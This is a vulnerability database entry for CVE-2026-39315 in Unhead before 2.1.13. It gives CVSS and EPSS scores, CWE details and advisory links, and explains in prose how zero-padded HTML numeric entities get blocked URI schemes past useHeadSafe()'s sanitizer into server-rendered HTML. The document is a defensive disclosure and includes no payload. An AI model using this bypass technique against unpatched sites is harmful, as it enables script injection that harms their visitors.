CVE-2026-39315

Published: Apr 09, 2026 Last Modified: Apr 14, 2026
ExploitDB:
Other exploit source:
Google Dorks:
MEDIUM 6,1
Source: [email protected]
Attack Vector: network
Attack Complexity: low
Privileges Required: none
User Interaction: required
Scope: changed
Confidentiality: low
Integrity: low
Availability: none

Description

AI Translation Available

Unhead is a document head and template manager. Prior to 2.1.13, useHeadSafe() is the composable that Nuxt's own documentation explicitly recommends for rendering user-supplied content in <head> safely. Internally, the hasDangerousProtocol() function in packages/unhead/src/plugins/safe.ts decodes HTML entities before checking for blocked URI schemes (javascript:, data:, vbscript:). The decoder uses two regular expressions with fixed-width digit caps. The HTML5 specification imposes no limit on leading zeros in numeric character references. When a padded entity exceeds the regex digit cap, the decoder silently skips it. The undecoded string is then passed to startsWith('javascript:'), which does not match. makeTagSafe() writes the raw value directly into SSR HTML output. The browser's HTML parser decodes the padded entity natively and constructs the blocked URI. This vulnerability is fixed in 2.1.13.

EPSS (Exploit Prediction Scoring System)

Trend Analysis

EPSS (Exploit Prediction Scoring System)

Prevede la probabilità di sfruttamento basata su intelligence sulle minacce e sulle caratteristiche della vulnerabilità.

EPSS Score
0,0005
Percentile
0,1th
Updated

EPSS Score Trend (Last 7 Days)

184

Incomplete List of Disallowed Inputs

Draft
Abstraction: Base Structure: Simple
Common Consequences
Security Scopes Affected:
Access Control
Potential Impacts:
Bypass Protection Mechanism
Applicable Platforms
All platforms may be affected
View CWE Details
Application

Unhead by Unjs

Product Information
Vendor Unjs
Product Unhead
Version Range Affected
To 2.1.13 (exclusive)
cpe:2.3:a:unjs:unhead:*:*:*:*:*:node.js:*:*
Common Platform Enumeration - Standardized vulnerability identification
https://github.com/unjs/unhead/security/advisories/GHSA-95h…
https://github.com/unjs/unhead/security/advisories/GHSA-95h2-gj7x-gx9w
https://github.com/unjs/unhead/commit/961ea781e091853812ffe…
https://github.com/unjs/unhead/commit/961ea781e091853812ffe17f8cda17105d2d2299
https://github.com/unjs/unhead/releases/tag/v2.1.13
https://github.com/unjs/unhead/releases/tag/v2.1.13
https://github.com/unjs/unhead/security/advisories/GHSA-95h…
https://github.com/unjs/unhead/security/advisories/GHSA-95h2-gj7x-gx9w